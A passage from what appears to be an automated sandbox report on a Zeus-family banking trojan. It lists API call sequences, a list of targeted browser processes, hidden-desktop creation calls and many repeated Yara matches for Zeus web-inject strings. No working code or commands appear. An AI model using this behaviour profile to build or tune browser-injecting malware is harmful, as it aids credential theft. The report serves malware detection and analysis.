eInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_00A35890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A36370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A36370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A36370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A23510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A23510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A23510
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C786C0 CreateDesktopA,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,SetThreadDesktop,memset,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,2_2_02C786C0

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.56.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.34.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.45.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f380000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.52.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.406400.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.56.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.49.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.d580000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.708de8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.50.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.49.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c40000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.53.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.53.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.50.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.47.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.d580000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.44.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7031e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.52.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.46.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
